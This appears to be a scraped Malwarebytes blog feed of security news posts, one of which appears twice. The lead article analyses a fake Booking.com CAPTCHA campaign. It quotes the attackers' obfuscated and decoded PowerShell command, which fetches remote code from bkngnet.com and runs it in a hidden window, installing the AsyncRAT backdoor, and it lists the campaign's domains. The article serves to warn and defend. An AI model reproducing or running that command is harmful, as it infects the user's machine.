Malware Bytes Security

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha prompt

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device

If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users

The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning

“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase   at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com

(booking.)badgustrewivers.com[.]com

(booking.)property-paids[.]com

(booking.)rewiewqproperty[.]com

(booking.)extranet-listing[.]com

(booking.)guestsalerts[.]com

(booking.)gustescharge[.]com

kvhandelregis[.]com

patheer-moreinfo[.]com

guestalerthelp[.]com

rewiewwselect[.]com

hekpaharma[.]com

bkngnet[.]com

partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com How to stay safe

There are a few things you can do to protect yourself from falling victim to these and similar methods:

• Do not follow instructions provided by a website you visited without thinking it through.
• Use an active anti-malware solution that blocks malicious websites and scripts.
• Use a browser extension that blocks malicious domains and scams.
• Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Porn sites probed for allegedly failing to prevent minors from accessing content
• Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts
• Deepfake-posting man faces huge $450,000 fine
• Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
• New warning issued over toll fee scams
• 184 million logins for Instagram, Roblox, Facebook, Snapchat, and more exposed online

Last week on ThreatDown:

• KMSpico explained: No, KMS is not “kill Microsoft”
• When you shouldn’t trust a trusted root certificate

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

This week on the Lock and Code podcast…

There’s an easy way to find out what Facebook knows about you—you just have to ask.

In 2020, the social media giant launched an online portal that allows all users to access their historical data and to request specific types of information for download across custom time frames. Want to know how many posts you’ve made, ever? You can find that. What about every photo you’ve uploaded? You can find that, too. Or what about every video you’ve watched, every “recognized” device you’ve used to log in, every major settings change you made, every time someone tagged you to wish you “Happy birthday,” and every Friend Request you ever received, sent, accepted, or ignored? Yes, all that information is available for you to find, as well.

But knowing what Facebook knows about you from Facebook is, if anything, a little stale. You made your own account, you know who your Facebook friends (mostly) are, and you were in control of the keyboard when you sent those comments.

What’s far more interesting is learning what Facebook knows about you from everywhere else on the web and in the real world.

While it may sound preposterous, Facebook actually collects a great deal of information about you even when you’re not using Facebook, and even if you don’t have the app downloaded on your smartphone. As Geoffrey Fowler, reporter for The Washington Post, wrote when he first started digging into his own data:

“Even with Facebook closed on my phone, the social network gets notified when I use the Peet’s Coffee app. It knows when I read the website of presidential candidate Pete Buttigieg or view articles from The Atlantic. Facebook knows when I click on my Home Depot shopping cart and when I open the Ring app to answer my video doorbell. It uses all this information from my not-on-Facebook, real-world life to shape the messages I see from businesses and politicians alike.”

Today, on the Lock and Code podcast, host David Ruiz takes a look at his own Facebook data to understand what the social media company has been collecting about him from other companies. In his investigation, he sees that his Washington Post article views, the cars added to his online “wishlist,” and his purchases from PlayStation, APC, Freda Salvador, and the paint company Backdrop have all trickled their way into Facebook’s database.

Tune in today to listen to the full episode.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Four porn sites are being investigated by the European Commission under its Digital Services Act (DSA) for allegedly failing to verify its users’ ages properly.

The Commission, which drafts and enforces the European Union’s laws, is focusing the lens on Pornhub, Stripchat, XNXX, and XVideos with the investigation. It launched the inquiry after sending requests for information to Pornhub, Stripchat and XVideos last June over how they were protecting minors.

The DSA, which came into force in November 2022, takes a strong position on who should be allowed to view adult material online. The Act singles out very large online platforms (VLOPs), which are online sites that have over 45 million users.

Article 28 of the Act directs these platforms to:

“…appropriate and proportionate measures to ensure a high level of privacy, safety, and security of minors, on their service.”

And article 35 mandates that VLOPs take:

“…targeted measures to protect the rights of the child, including age verification and parental control tools, tools aimed at helping minors signal abuse or obtain support, as appropriate”.

The investigation follows the Commission’s publication of draft guidelines for the protection of minors online for all VLOPs (not just adult ones) earlier this month. These guidelines included implementing age verification measures. The Commission is inviting public feedback on that consultation by June 10.

Age verification in the US

This isn’t the first time that large adult sites have had to deal with this issue. Multiple US states have passed legislation requiring age verification for the sites, prompting Pornhub to block access to its services there. Pornhub chose to do that rather than comply with the age verification process because, it said, it didn’t want to invade peoples’ privacy:

“There are multiple ways that a user can prove their age, but any effective method requires them to submit some form of personally identifiable information (“PII”), like a driver’s license. By assigning this responsibility to the platform(s) visited by a user, this means submitting private information many times to adult sites all over the internet, while normalizing disclosure of PII across the internet. This is not a privacy-by-design approach.”

Pornhub also argued that its traffic dropped by 80% when it did try imposing age checks, and suggested that if asked for age verification, users will simply get adult material from other sources including piracy sites.

Verifying age safely

The Commission is planning to release a Digital Identity Wallet for identification purposes by the end of next year. In the meantime, it has promised an age verification app based on the same technology as the wallet by this summer. That app will enable people to verify their age without giving away any other personal information, it says.

Categorization as a VLOP under the DSA carries substantial risks. Those that don’t comply with the DSA face fines totaling up to 6% of their annual global revenue, and could even be banned from operating in the EU. In March 2024, Pornhub, XVideos and Stripchat sued the EU over their designations. Pornhub argued that the Commission miscalculated its user numbers, and contested a requirement to build a publicly accessible repository of advertisements running on the platform.

When announcing the investigation, the EU said month that that it is removing Stripchat as a VLOP because it doesn’t have enough EU users to qualify. That means it won’t have to comply with those requirements after September.

However, that doesn’t mean that Stripchat, or other smaller adult sites, are off the hook. The EBDS also announced an initiative to coordinate monitoring and control of these platforms among national regulators, it said. That includes sharing information about monitoring and enforcing age verification measures on those sites.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Search hijacking, often referred to as browser hijacking, occurs when cybercriminals modify users’ browser settings without their consent. This often results in users being redirected to potentially malicious websites, such as fake customer service offerings.  

Search hijacking commonly happens through free downloads, bundled software, or fake browser extensions that pose as helpful tools.  

These attacks can be very stealthy and often go unnoticed until the victim sees unexpected changes in their browsing activity. 

Hijacking attacks may involve adding fraudulent toolbars, redirecting users to websites that steal personal information, or installing ransomware on victims’ devices, forcing them to pay a ransom to regain access.  

Malwarebytes Browser Guard already protects your browser by blocking malicious websites, credit card skimmers, and trackers. Now, it will actively monitor your search results for unauthorized modifications and alert you to potential scams, providing an essential layer of additional protection.  

Add Malwarebytes Browser Guard to your favorite browser for free. Try it now 

GET BROWSER GUARD

 

A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site. That’s if Australia’s online safety regulator gets its way.

Anthony Rotondo faces charges of posting these and other explicit deepfake images to the MrDeepfakes website, which closed down earlier this month.

According to a court order approving an arrest warrant for him in October 2023, the 55 year-old posted pictures of the Australian public figures online but when the country’s eSafety Commissioner—which regulates online safety—asked him to take them down in May 2023, he responded:

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right.”

Rotondo, who lived in the Philippines, traveled to Australia on October 10, 2023, apparently to attend a car race on the Gold Coast. On October 20, the Office of the ESafety Commissioner got an injunction against him in Australian Federal Court, asking him to take down the images. Instead, he sent another deepfake image to media outlets and to the eSafety Commissioner’s office. The police arrested him at an apartment in Brisbane, Queensland, a few days later.

Once in custody, Rotondo gave police his access credentials to the website, enabling them to take the images down. However, a federal judge fined him $25,000 for contempt of court. He was also charged with six counts of obscene publication, one of which involved a minor. The court added another charge of endangering property by fire.

The eSafety Commissioner is now pushing for a fine of $450,000 over the obscenity charges.

What is a deepfake?

A deepfake is an image of a person produced using AI. Today it’s most commonly used to project an existing person’s likeness onto someone else’s image or video. Some include just photos, while others consist of video and audio. Audio-only deepfakes are also used to impersonate others’ voices.

Deepfake technology can be used for good, such as rekindling someone’s voice after they lose the ability to speak. There have also been some imaginative uses, such as the representation of a murder victim as a deepfake who gave an impact statement in court. Some have explored using the technology to animate the images of deceased loved ones.

However, many uses of deepfakes are less savory. Scammers use deepfake videos of popular public figures to lure victims into fraudulent investments, and deepfake voice recordings to fool family members into thinking their loved one has been involved in an accident or arrested. Deepfake porn, in which a victim’s likeness is projected onto explicit images or video, is now a scourge, and deepfake child sex abuse material is also on the rise.

As Australian eSafety Commissioner Julie Inman Grant said in a testimony to the country’s senate last July:

“The harms caused by image-based abuse have been consistently reported. They include negative impacts on mental health and career prospects, as well as social withdrawal and interpersonal difficulties.”

She continued:

“Victim-survivors have also described how their experiences of image-based abuse radically disrupted their lives, altering their sense of self, identity and their relationships with their bodies and with others.”

The following month, politicians passed an amendment to the country’s Criminal Code that introduced new penalties for sharing such content.

However, politicians have also been a hindrance. The Liberal National Party in Queensland posted a nonsexual deepfake of the state’s premier, Steven Miles, in a negative political campaign.

MrDeepfakes was the largest deepfake site in the world. It hosted at least 43,000 deepfake pictures of 3,800 people, most of whom were female musicians or actors. The site’s creators took it down early this month, citing data loss, and stating that they would not be resurrecting it.

How to protect yourself

The National Cybersecurity Alliance offers advice on protecting yourself against deepfakes, and the Cyber Civil Rights Initiative offers resources for those who have been targeted.

If you’re in the UK, the Revenge Porn helpline helps support those targeted by image abuse.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site. That’s if Australia’s online safety regulator gets its way.

Anthony Rotondo faces charges of posting these and other explicit deepfake images to the MrDeepfakes website, which closed down earlier this month.

According to a court order approving an arrest warrant for him in October 2023, the 55 year-old posted pictures of the Australian public figures online but when the country’s eSafety Commissioner—which regulates online safety—asked him to take them down in May 2023, he responded:

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right.”

Rotondo, who lived in the Philippines, traveled to Australia on October 10, 2023, apparently to attend a car race on the Gold Coast. On October 20, the Office of the ESafety Commissioner got an injunction against him in Australian Federal Court, asking him to take down the images. Instead, he sent another deepfake image to media outlets and to the eSafety Commissioner’s office. The police arrested him at an apartment in Brisbane, Queensland, a few days later.

Once in custody, Rotondo gave police his access credentials to the website, enabling them to take the images down. However, a federal judge fined him $25,000 for contempt of court. He was also charged with six counts of obscene publication, one of which involved a minor. The court added another charge of endangering property by fire.

The eSafety Commissioner is now pushing for a fine of $450,000 over the obscenity charges.

What is a deepfake?

A deepfake is an image of a person produced using AI. Today it’s most commonly used to project an existing person’s likeness onto someone else’s image or video. Some include just photos, while others consist of video and audio. Audio-only deepfakes are also used to impersonate others’ voices.

Deepfake technology can be used for good, such as rekindling someone’s voice after they lose the ability to speak. There have also been some imaginative uses, such as the representation of a murder victim as a deepfake who gave an impact statement in court. Some have explored using the technology to animate the images of deceased loved ones.

However, many uses of deepfakes are less savory. Scammers use deepfake videos of popular public figures to lure victims into fraudulent investments, and deepfake voice recordings to fool family members into thinking their loved one has been involved in an accident or arrested. Deepfake porn, in which a victim’s likeness is projected onto explicit images or video, is now a scourge, and deepfake child sex abuse material is also on the rise.

As Australian eSafety Commissioner Julie Inman Grant said in a testimony to the country’s senate last July:

“The harms caused by image-based abuse have been consistently reported. They include negative impacts on mental health and career prospects, as well as social withdrawal and interpersonal difficulties.”

She continued:

“Victim-survivors have also described how their experiences of image-based abuse radically disrupted their lives, altering their sense of self, identity and their relationships with their bodies and with others.”

The following month, politicians passed an amendment to the country’s Criminal Code that introduced new penalties for sharing such content.

However, politicians have also been a hindrance. The Liberal National Party in Queensland posted a nonsexual deepfake of the state’s premier, Steven Miles, in a negative political campaign.

MrDeepfakes was the largest deepfake site in the world. It hosted at least 43,000 deepfake pictures of 3,800 people, most of whom were female musicians or actors. The site’s creators took it down early this month, citing data loss, and stating that they would not be resurrecting it.

How to protect yourself

The National Cybersecurity Alliance offers advice on protecting yourself against deepfakes, and the Cyber Civil Rights Initiative offers resources for those who have been targeted.

If you’re in the UK, the Revenge Porn helpline helps support those targeted by image abuse.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Cybercriminals are taking advantage of the public’s interest in Artificial Intelligence (AI) and delivering malware via text-to-video tools.

According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors.

Links to the malicious websites were brought to the researchers’ attention by ads and links in comments on social media platforms. The researchers uncovered thousands of malicious ads on Facebook and LinkedIn—beginning in November 2024—that promote fake AI video generator tools such as “Luma AI,” “Canva Dream Lab,” and “Kling AI.”

To avoid detection, the group constantly rotates the domain used in the ads and creates new ads every day, while using both compromised and newly created accounts. The campaign operates through more than 30 websites that imitate popular legitimate AI tools.

Researchers identified the first payload as the Starkveil dropper (detected by Malwarebytes/ThreatDown) classified as Trojan.Crypt. The Trojan, written in Rust, requires users to run it twice to fully compromise their machines. After the first run, the malware displays an error window to trick victims into executing it again.

The dropper then deploys the XWorm (detected as Backdoor.XWorm) and Frostrift (detected as Trojan.Crypt) backdoors and the GRIMPULL downloader (also detected as Trojan.Crypt).

After it has fully compromised the system, this constellation of malware will harvest all kinds of data from the infected devices and send it to the cybercriminals using various methods of communication. For a full technical analysis of the malware, feel free to read the researchers’ report.

How to avoid fake AI tool scams

The researchers stated:

“The temptation to try the latest AI tool can lead to anyone becoming a victim.”

So, it’s important to be aware of these campaigns and adopt ways to recognize and thwart them.

• Be vigilant. Posts or ads with high numbers of views that promise free AI text-to-video tools are a red flag and should be examined carefully, especially if they prompt downloads of executable files, which could be disguised as videos.
• Don’t trust unsolicited messages or ads promising unbelievable AI tools or free trials, especially if they pressure you to act quickly or provide personal information.
• Run up-to-date and active protection to intercept these malware infections in the early stages, as well as detect and remove infostealer malware.
• Use web protection in your browser that can recognize and block scams and malicious websites.
• Don’t click on sponsored search results. Any other method to find a link to your coveted product is preferable over sponsored results, since criminals have demonstrated that it pays off to outbid the rightful owners.
• Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers.
• Scrutinize the provided URLs which might be constructed to look like the “real thing” but they might not be.
• Only download AI software or tools from official, trusted sources or verified app stores.

For more actionable advice on how to spot scams, join our Facebook Live on June 3.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Over a year ago the FBI warned about what was then a new form of smishing (phishing via SMS) scam: text messages that demanded payment for toll fees.

The FTC sent out a similar warning in January, 2025. Then, in April another wave of toll fee scams began doing the rounds.

Now the Departments of Motor Vehicles (DMVs) of New York, Florida, and California are warning residents not to fall for the text message scams that try to trick users into clicking a link by telling them they owe a “small amount” in toll fees.

The amount of smishing messages is a major problem. Reportedly, in April of 2025 alone, Americans received 19.2 billion automated spam texts which amounts to roughly 63 spam texts for every single person in the country.

And it seems to be paying off for the cybercriminals involved in fraud. The FTC’s 2024 Annual Data Book shows that 16% of the reported fraud attempts were text-based, with a criminal revenue of some $470 Million.

How to avoid falling for toll fee scams

• Check the phone number that the text message comes from. Some of the scams we saw were easy to dismiss because they came from telephone numbers outside the US.
• Look for the actual site that handles the alleged toll fees and compare the domain name. Sometimes there is only a small difference, so inspect it carefully.
• If you decided to pay, make sure you receive confirmation of payment. Official toll agencies will send confirmation after collecting payments. If you don’t receive that, call the toll service to check.
• Try never to interact with the scammer in any way. Every reaction provides them with information, even if it’s only that the phone number is in use.
• If you think the toll fee is feasible because you have indeed travelled in that area, check on the official toll service’s website or call their customer service number.
• Malwarebytes Mobile Security for both Android and iOS includes a “Text Protection” feature that alerts users about potentially fraudulent or phishing text messages, helping to prevent scams and other online threats. This feature scans incoming text messages for suspicious content, such as malicious links or suspicious phrases, and warns the user to be cautious. 
• The FBI asks that if you receive a suspicious message, contact the FBI Internet Crime Complaint Center at ic3.gov. Be sure to include the phone number from where the text originated, and the website listed within the text.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

A recent discovery by cybersecurity researcher Jeremiah Fowler of an unsecured database containing over 184 million unique login credentials has once again highlighted the growing threat posed by infostealers. While the sheer volume of exposed data—including emails, passwords, and authorization URLs—is alarming, the real concern is not just about the exposure itself, but in how cybercriminals collect and weaponize these credentials.

This trove of data from a wide range of services like email providers, Microsoft, Facebook, Instagram, Snapchat, Roblox, and many more, doesn’t appear to have been leaked by accident by someone who obtained the data legitimately. More likely, it was amassed by infostealers—malicious software (malware) that are designed specifically to gather sensitive information from infected devices. These malware variants silently extract credentials stored in browsers, email clients, messaging apps, and even crypto wallets. They often arrive via phishing emails, malicious websites, or bundled with cracked software.

An infamous example of an infostealer is the Lumma Stealer, which recently suffered a serious disruption of its infrastructure by authorities. Unfortunately, there are several others which may not be as widespread as Lumma, but at least at the same level of sophistication.

What this means is that the exposed credentials are likely just a fraction of what cybercriminals have already harvested from likely millions of victims worldwide. Each infected device can yield dozens or hundreds of credential sets, multiplying the scale of the problem far beyond a single breach. If a criminal can tie all these different types of stolen information to one person, like the operator of an infostealer would, it would be easy to use those details for identity theft.

The database has since been removed from public view.

How many people are affected?

Given the volume of credentials found, it’s reasonable to assume that millions of individuals had their data included in the exposed database. Since one infected system can leak multiple credentials tied to different accounts and services, the number of victims is likely far smaller than the number of exposed credentials but still alarmingly high.

Infostealers have evolved beyond simple password grabbers. Modern variants can capture autofill data, cookies, screenshots, and keystrokes, giving attackers a comprehensive toolkit to bypass security measures and launch sophisticated attacks. The stolen credentials fuel credential stuffing attacks (where an attacker uses reused logins stolen from one service to access another), account takeovers, identity theft, corporate espionage, and targeted phishing campaigns.

The fact that these credentials span a wide range of services, from social media platforms like Facebook and Instagram to financial institutions, healthcare portals, and even government accounts shows how pervasive infostealer infections have become, enabling attackers to build detailed profiles of victims’ digital lives.

What you can do

There is no way to tell whether anyone else found the exposed database before it was removed from public access. However, the exposure of such a massive dataset should serve as a wake-up call. While the breach itself may no longer be the immediate threat, infostealer malware remains an ongoing and growing threat. Here are some practical steps to protect yourself:

• Change your passwords regularly, and don’t reuse them across multiple accounts. Use unique, complex passwords for every service.
• Enable two-factor authentication (2FA) wherever possible. This makes it harder for criminals to take over your account.
• Regularly audit and clean your email inbox of sensitive documents and old passwords. Jeremiah pointed out that “people unknowingly treat their email accounts like free cloud storage and keep years’ worth of sensitive documents, such as tax forms, medical records, contracts, and passwords without considering how sensitive they are.”
• Use an up-to-date and active anti-malware solution  that can detect and remove infostealer malware.
• Be careful about what you download and educate yourself on recognizing phishing emails, as these remain the most common infection vectors.

Given the scale and sophistication of infostealer operations, it’s not enough to wait for breach notifications to find out whether your credentials have been compromised. That’s why proactive monitoring is essential.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by an infostealer and exposed online. We have many millions of stolen records in our database that stem from Lumma stealers alone and are being traded on the dark web. Just put in the email address you use the most, and we’ll tell you what information is out there about you.

Don’t wait for a data breach to impact you. Check your digital footprint and stay one step ahead of cybercriminals.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Lumma information stealer infrastructure disrupted
• Stalkerware apps go dark after data breach
• Scammers are using AI to impersonate senior officials, warns FBI
• 23andMe and its customers’ genetic data bought by a pharmaceutical org
• Malware-infected printer delivered something extra to Windows users
• How Los Angeles banned smartphones in schools (Lock and Code S06E10)
• Update your Chrome to fix serious actively exploited vulnerability

Last week on ThreatDown:

• May 2025 Patch Tuesday includes five zero-day vulnerabilities

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The US Department of Justice (DOJ) and Microsoft have disrupted the infrastructure of the Lumma information stealer (infostealer).

Lumma Stealer, also known as LummaC or LummaC2, first emerged in late 2022 and quickly established itself as one of the most prolific infostealers. Infostealers is the name we use for a group of malware that collects sensitive information from infected devices and sends the data to an operator. Depending on the type of infostealer and the goals of the operator, infostealers can be interested in taking anything from usernames and passwords to credit card details, and cryptocurrency wallets.

Lumma operates under a malware-as-a-service (MaaS) model, meaning its creators sell access to the malware on underground marketplaces and platforms like Telegram. This model allows hundreds of cybercriminals worldwide to deploy Lumma for their own malicious campaigns.

What makes Lumma particularly dangerous is its wide range of targets and its evolving sophistication. It doesn’t just grab browser-stored passwords or cookies. It’s also capable of extracting autofill data, email credentials, FTP client data, and even two-factor authentication tokens and backup codes, which enables attackers to bypass additional security layers.

As Matthew R. Galeotti, head of the Justice Department’s Criminal Division put it:

“Malware like LummaC2 is deployed to steal sensitive information such as user login credentials from millions of victims in order to facilitate a host of crimes, including fraudulent bank transfers and cryptocurrency theft.”

Over the last few months alone, Microsoft identified over 394,000 Windows computers infected with Lumma worldwide. The FBI estimates that Lumma has been involved in around 10 million infections globally.

Using a court order from the US District Court for the Northern District of Georgia, Microsoft’s DCU seized and facilitated a takedown, suspension, and blocking of approximately 2,300 malicious domains that were part of the infostealer’s backbone.

Most of the seized domains served as user panels, where Lumma customers are able to access and deploy the infostealer, so this will stop the criminals from being able to to access Lumma in order to compromise computers and steal victim information.

Government agencies and researchers sometimes alter DNS addresses to lead the traffic to their own servers (called sinkholes). By redirecting the seized domains to Microsoft-controlled sinkholes, investigators can now monitor ongoing attacks and provide intelligence to help defend against similar threats in the future. This takedown slows down cybercriminals, disrupts their revenue streams, and buys time and knowledge for defenders to strengthen security.

How to protect yourself

Even with the Lumma infrastructure disrupted, the threat of information stealers remains very real and evolving. Here are some practical steps to reduce your risk:

• Use strong, unique passwords for every account and consider a reputable password manager to keep track of them.
• Enable multi-factor authentication (MFA) wherever possible. Although Lumma tries to bypass 2FA, having it still adds a crucial layer of defense.
• Be cautious with emails and downloads. Lumma often spreads through phishing emails and malicious downloads, sometimes disguised as legitimate CAPTCHAs or antivirus software.
• Keep your software and operating system updated to patch vulnerabilities that malware can exploit.
• Regularly monitor your financial and online accounts for suspicious activity.
• Educate yourself about phishing and social engineering tactics to avoid falling victim to trickery.
• Use an up-to-date real-time anti-malware solution to block install attempts and detect active information stealers.

By understanding how threats like Lumma operate and by taking the necessary steps to protect ourselves, we can reduce the risk of falling prey to these invisible thieves.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by a Lumma infostealer. We have many millions of stolen records stemming from Lumma stealers that are being traded on the Dark Web in our database.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A stalkerware company that recently leaked millions of users’ personal information online has taken all of its assets offline without any explanation. Now Malwarebytes has learned that the company has taken down other apps too.

Back in February, news emerged of a stalkerware app compromise. Reporters at Techcrunch revealed a vulnerability in three such apps: Spyzie, Cocospy, and Spyic. The flaw exposed data from the victim’s devices, rendering their messages, photos, and location data visible to whomever wanted them. It also gave up approximately 3.2 million email addresses entered by the customers that bought and installed these apps on their targets’ devices.

The bug was so easy to exploit that Techcrunch and the researcher involved wouldn’t divulge it, to protect the compromised details.

Now, the apps have gone dark. Techcrunch revealed that the software has stopped working, and the websites advertising it have disappeared. The spyware’s Amazon Web Services storage has also been deleted. The publication speculated that the apps, which were branded separately but looked nearly identical, were possibly shut down to avoid legal repercussions over the data leak.

Stalkerware apps are designed to hide themselves once installed on a person’s phone. They collect data including the location of the device, messages sent by the user, and their contacts.

Spyzie’s web site, now no longer available, marketed the software as a tool to keep an eye on your kids. It advertised itself as “100% hidden and invisible so you never get caught”. It also offered to collect their browser history, WhatsApp messages (including deleted ones), Facebook messages, and call logs. Spyzie claimed to have over a million users in more than 190 countries.

These aren’t the only three apps that the same organization took down. According to archived records of the Spyzie site, it was operated by FamiSoft Limited. That company also produced another app targeting kids called Teensafe (its website is also now down). Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.

Stalkerware is typically installed by those with direct access to a user’s phone or computer, and typically doesn’t need you to root or jailbreak the device. Spyzie targeted both Android and iPhone platforms. While frequently marketed as a way to keep children safe, theses are also frequently used by abusive partners or ex-partners, as explained by the Federal Trade Commission. The Coalition against Stalkerware, of which Malwabytes is a founding member, offers advice on what to do if you’re being targeted by a stalker.

There have been several instances over the years of stalkerware apps leaking data. It’s especially pernicious because in many cases it isn’t just the email addresses of the stalkerware’s customers that is compromised; it’s the personal details of the people whose phones are being spied upon.

Those people may often not be aware that they’re being surveilled, or might have been forced to install the software against their wishes. They are victimized twice: once when an individual invades their privacy, and twice when crummy infrastructure exposes their information more widely. If a customer really is using such software as a way of protecting their children, they might want to reconsider their choices.

Are you a victim of domestic abuse, or are you worried that someone else is? If you’re in the US, you can contact the National Domestic Abuse Hotline. If you’re in the UK, the government has a useful resource page to help victims and the charity Refuge operates a hotline.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The FBI has issued a warning about an ongoing malicious text and voice messaging campaign that impersonates senior US officials.

The targets are predominantly current or former US federal or state government officials and their contacts. In the course of this campaign, the cybercriminals have used test messages as well as Artificial Intelligence (AI)-generated voice messages.

After establishing contact, the criminals often send targets a malicious link which the sender claims will take the conversation to a different platform. On this messaging platform, the attacker may push malware or introduce hyperlinks that direct targets to a site under the criminals’ control in order to steal login information, like user names and passwords.

The AI-generated audio used in the vishing campaign is designed to impersonate public figures or a target’s friends or family to increase the believability of the malicious schemes. A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.”

Due to the rapid developments in AI, vishing attacks are becoming more common and more convincing. We have seen reports about callers pretending to be employers, family, and now government officials. What they have in common is that they are after information they can use to steal money or sensitive information from the victim.

How to stay safe

Because these campaigns are very sophisticated and targeted, it’s important to stay vigilant. Some recommendations:

• Independently verify the identity of the person contacting you, via a different method.
• Carefully examine the origin of the message. The criminals typically use software to generate phone numbers that are not attributed to a specific mobile phone or subscriber.
• Listen closely to the tone and word choice of the caller. Do they match those of the person allegedly calling you? And pay attention to any kind of voice call lag time.
• AI-generated content has advanced to the point that it is often difficult to identify. When in doubt about the authenticity of someone wishing to communicate with you, contact your relevant security officials or the FBI for help.

If you believe you have been the victim of the campaign described above, contact your relevant security officials and report the incident to your local FBI Field Office or the Internet Crime Complaint Center (IC3) at www.ic3.gov. Be sure to include as much detailed information as possible.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

The bankrupt genetic testing company 23andMe has been scooped up by drug producer Regeneron Pharmaceuticals for $256 million dollars.

But why would a pharmaceutical company like Regeneron buy a bankrupt genetics testing company like 23andMe for such a large amount of money?

Well, Regeneron is a leading biotechnology company that invents, develops, and monetizes life-transforming medicines for people with serious diseases. So, it seems obvious that Regeneron’s primary interest lies in the genetic data collected by 23andMe, and the situation raises complex ethical, privacy, and security concerns that customers should understand and address.

Regeneron has pledged to uphold data privacy and security, working closely with a court-appointed Customer Privacy Ombudsman, acknowledging the importance of customer data protection and the ethical use of genetic information.
